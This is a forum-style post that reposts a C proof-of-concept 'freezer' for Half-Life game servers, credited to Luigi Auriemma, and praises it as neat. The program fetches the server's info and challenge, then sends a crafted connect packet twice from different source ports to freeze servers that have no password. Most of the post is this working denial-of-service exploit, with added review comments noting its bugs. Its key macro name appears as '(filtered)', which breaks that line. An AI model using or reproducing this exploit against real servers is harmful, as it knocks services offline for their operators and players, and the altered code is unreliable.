I recently stumbled across this code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define usleep sleep
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 4096
#define PORT 27015
#define INFO "\xff\xff\xff\xff" \
"infostring\n\0"
#define GETCH "\xff\xff\xff\xff" \
"getchallenge\n\0"
#define CHOFFSET 14 /* Challenge offset "A00000000 " */
#define CRASH 2 /* number of packets for cause the freeze */
#define TIMEOUT 5 /* 5 seconds */
#define (filtered) "\xff\xff\xff\xff" \
"connect %d" \
" %s \"" \
"\\prot\\2" \
"\\unique\\-1" \
"\\raw\\00000000000000000000000000000000" \
"\"fuckyou!"
int getproto(unsigned char *buff);
int pwdonoff(unsigned char *buff);
void timeout(int sock);
void showinfostring(unsigned char *buff, int size);
u_long resolv(char *host);
void std_err(void);
/*
 * Entry point. argv[1] is the target host (name or dotted quad), optional
 * argv[2] the UDP port (default PORT). As the code below shows, it sends
 * INFO and reads the reply, sends GETCH and reads the challenge, then builds
 * one datagram from the (filtered) format macro and sends it CRASH times
 * from consecutive local ports, printing each reply.
 * Every error path terminates through std_err() or exit(1).
 */
int main(int argc, char *argv[]) {
    unsigned char buffrecv[BUFFSZ],
    buffsend[sizeof((filtered)) + 16],   /* size of the format macro plus 16 bytes for the expanded %d/%s */
    challenge[16];                        /* NOTE(review): nothing below guarantees a NUL inside these 16 bytes */
    struct sockaddr_in peer,              /* remote server */
    peerbind;                             /* local address bound by each sending socket */
    int sd,
    err,
    rlen,                                 /* address length; an int where recvfrom() expects socklen_t* */
    chlen,
    num,
    bufflen,
    proto,
    on = 1,                               /* SO_REUSEADDR value */
    pwd;
    unsigned short randport;

    setbuf(stdout, NULL);                 /* unbuffered stdout */
    fputs("\n"
    "Half-Life (all versions) freezer "VER"\n"
    "by Luigi Auriemma\n"
    "e-mail: aluigi@pivx.com\n"
    "web: http://www.pivx.com/luigi/\n"
    "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <host> [port(%u)]\n", argv[0], PORT);
        exit(1);
    }

#ifdef WIN
    WSADATA wsadata;
    WSAStartup(MAKEWORD(2,0), &wsadata);  /* return value is not checked */
#endif

    srand(time(NULL));                    /* seeds rand() for the local port chosen below */
#ifdef WIN
    srand(rand()); /* better */
#endif

    peer.sin_addr.s_addr = resolv(argv[1]);   /* resolv() exits on failure */
    if(argc == 3) peer.sin_port = htons(atoi(argv[2]));   /* atoi(): no range or error check on the port */
    else peer.sin_port = htons(PORT);
    peer.sin_family = AF_INET;
    rlen = sizeof(peer);
    peerbind.sin_addr.s_addr = INADDR_ANY;
    peerbind.sin_family = AF_INET;        /* sin_port is assigned per iteration in the loop below */

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    /* GET INFORMATIONS */
    /* sizeof - 1 drops only the literal's implicit terminator; the explicit \0 inside INFO is sent */
    err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    timeout(sd);                          /* exits if nothing is readable within TIMEOUT seconds */
    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    buffrecv[err] = 0x00;                 /* BUG: recvfrom() may return BUFFSZ, and this then writes one byte past buffrecv */
    proto = getproto(buffrecv); /* protocol version */
    pwd = pwdonoff(buffrecv); /* check if password is required */
    showinfostring(buffrecv, err);        /* also checks the reply header and exits when it is wrong */

    /* GET CHALLENGE NUMBER */
    err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
    if(err < 0) std_err();
    timeout(sd);
    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
    if(err < 0) std_err();
    close(sd);
    chlen = err - CHOFFSET - 4;           /* BUG: a reply shorter than CHOFFSET + 4 bytes makes this negative, which strncpy() receives as a huge size_t */
    strncpy(challenge, buffrecv + CHOFFSET, chlen);   /* no terminator is written when chlen >= sizeof(challenge) */
    printf("Challenge: %s\n", challenge);             /* %s reads past challenge[] in that case */

    if(pwd == '1') {
        fputs("\nError: The server is protected by password. ONLY servers without password are vulnerables!\n", stdout);
        exit(1);
    }

    /* (filtered) is the format string: %d <- proto, %s <- challenge */
    bufflen = snprintf(buffsend,
    sizeof(buffsend),
    (filtered),
    proto,
    challenge);                           /* bufflen is snprintf()'s would-be length; it is not compared with sizeof(buffsend) */

    fputs("\n\nIf the socket goes in timeout, the remote server is down!\n\n", stdout);

#ifdef WIN
    randport = rand() + 1; /* 16 (filtered) bits */
#else
    randport = (rand() >> 15) + 1; /* yeah, 32 bits */
    /* NOTE(review): if RAND_MAX is 2^31-1 the shift yields up to 65535, so +1 can wrap randport to 0 */
#endif
    printf("\nRandom Port: %hu\n", randport);

    for(num = 0; num < CRASH; num++) {
        /* we create the socket */
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));
        if(err < 0) std_err();

        /* we send the packets from 2 different source ports */
        /* no htons() here, unlike peer.sin_port above: on a little-endian host the port actually bound is the byte-swapped value of the one printed */
        peerbind.sin_port = randport + num;
        err = bind(sd, (struct sockaddr *)&peerbind, rlen);
        if(err < 0) std_err();

        /* we send the packet */
        err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
        if(err < 0) std_err();
        timeout(sd);
        err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
        if(err < 0) std_err();
        printf("Connect: %s\n", buffrecv + 5);   /* this reply is not NUL-terminated here; %s relies on leftover bytes in buffrecv */
        close(sd);
        sleep(0);                                /* zero-second sleep: effectively a no-op */
    }

    fputs("\nThe server doesn't seems to be vulnerable, sorry\n\n", stdout);
    return(0);
}
/*
 * Extract the numeric "protocol" value from a server info reply.
 *
 * buff: NUL-terminated reply. The search starts 23 bytes in, so the caller
 *       must supply at least that many bytes; nothing here checks it.
 * Returns the integer that follows "protocol" and its separator byte
 * (9 bytes past the match), parsed with atoi(); prints a message and
 * exits(1) when the key is absent.
 */
int getproto(unsigned char *buff) {
    unsigned char *key = strstr(buff + 23, "protocol");
    if(key == NULL) {
        fputs("\nError: No protocol informations in the answer of the server\n", stdout);
        exit(1);
    }
    /* 8 bytes of "protocol" plus one separator byte */
    return atoi(key + 9);
}
/*
 * Read the "password" flag byte from a server info reply.
 *
 * buff: NUL-terminated reply; as in getproto(), the search starts at
 *       offset 23 without any length check.
 * Returns the byte located 9 positions after "password" (past the key and
 * its separator) when the key is present, otherwise '0'. Only that single
 * byte is inspected.
 */
int pwdonoff(unsigned char *buff) {
    unsigned char *key = strstr(buff + 23, "password");
    if(key == NULL) {
        return '0';
    }
    return key[9];
}
/*
 * Check the reply header and print the "\key\value" segments of an info
 * string, alternating "segment\n" and "segment: " so pairs land on one line.
 *
 * buff: the raw reply; modified in place (every '\\' becomes a NUL).
 * size: number of valid bytes in buff.
 * Exits(1) unless the leading sizeof(long) bytes, read as a long, equal -1
 * (i.e. are all 0xff). The comparison width is sizeof(long), the same as
 * the original pointer cast; the value is fetched with memcpy() to avoid
 * the aliasing/alignment issue of that cast.
 */
void showinfostring(unsigned char *buff, int size) {
    long header;
    int colon_next = 0;      /* 0 -> print "%s\n", 1 -> print "%s: " */
    unsigned char *sep;

    fputs("\n--------------------------------------------------\n", stdout);

    memcpy(&header, buff, sizeof header);
    if(header != -1) {
        fputs("\nError: Bad answer from the server (it is not a true server)\n", stdout);
        exit(1);
    }

    /* skip the first NUL-terminated chunk when more data follows it */
    int skip = strlen(buff);
    if(skip < size) buff += skip + 1;

    while((sep = strchr(buff, '\\')) != NULL) {
        *sep = 0x00;
        if(colon_next) {
            printf("%s: ", buff);
        } else {
            printf("%s\n", buff);
        }
        colon_next = !colon_next;
        buff = sep + 1;
    }
    printf("%s\n", buff);    /* whatever follows the last separator */
}
/*
 * Wait until sock is readable or TIMEOUT seconds elapse.
 *
 * sock: descriptor to watch; FD_SET() has no bound check, so it must be
 *       below FD_SETSIZE.
 * Calls std_err() if select() fails; prints a message and exits(1) on
 * expiry. Returns only when the descriptor is readable.
 */
void timeout(int sock) {
    struct timeval tv = { .tv_sec = TIMEOUT, .tv_usec = 0 };
    fd_set readable;
    int ready;

    FD_ZERO(&readable);
    FD_SET(sock, &readable);
    ready = select(sock + 1, &readable, NULL, NULL, &tv);
    if(ready < 0) std_err();
    if(ready == 0) {
        fputs("\nError: Socket timeout, no answers received\n", stdout);
        exit(1);
    }
}
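/*
 * Resolve host (dotted quad or hostname) to an IPv4 address in network
 * byte order.
 *
 * host: NUL-terminated string as given on the command line.
 * Returns the 32-bit address zero-extended into a u_long. On failure
 * prints "Unable to resolv hostname" and exits(1).
 *
 * Fix: the old code read sizeof(u_long) bytes through a u_long pointer at
 * hp->h_addr, which on 64-bit hosts over-reads the 4-byte address and
 * returns junk in the high bits. The address is now copied with memcpy()
 * into a struct in_addr after checking the family and length reported by
 * gethostbyname(). Inherited limitation: inet_addr() returns INADDR_NONE
 * for "255.255.255.255" as well, so that literal goes through the resolver.
 */
u_long resolv(char *host) {
    u_long host_ip = inet_addr(host);         /* INADDR_NONE when host is not a dotted quad */
    if(host_ip == INADDR_NONE) {
        struct hostent *hp = gethostbyname(host);
        struct in_addr addr;
        if(hp == NULL || hp->h_addrtype != AF_INET
        || hp->h_length != (int)sizeof(addr) || hp->h_addr_list[0] == NULL) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        }
        memcpy(&addr, hp->h_addr_list[0], sizeof(addr));   /* exactly 4 bytes, no aliasing cast */
        host_ip = addr.s_addr;
    }
    return(host_ip);
}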
#ifndef WIN
/*
 * Print the current errno description after "\nError" and terminate with
 * status 1. Built only when WIN is not defined (see the surrounding guard).
 */
void std_err(void) {
    static const char prefix[] = "\nError";
    perror(prefix);
    exit(1);
}
#endif
///
As the author said, ONLY servers that are NOT password protected and that do NOT use WON authentication are vulnerable. But it's still neat.
Credits - http://www.pivx.com/luigi/index.htm#poc




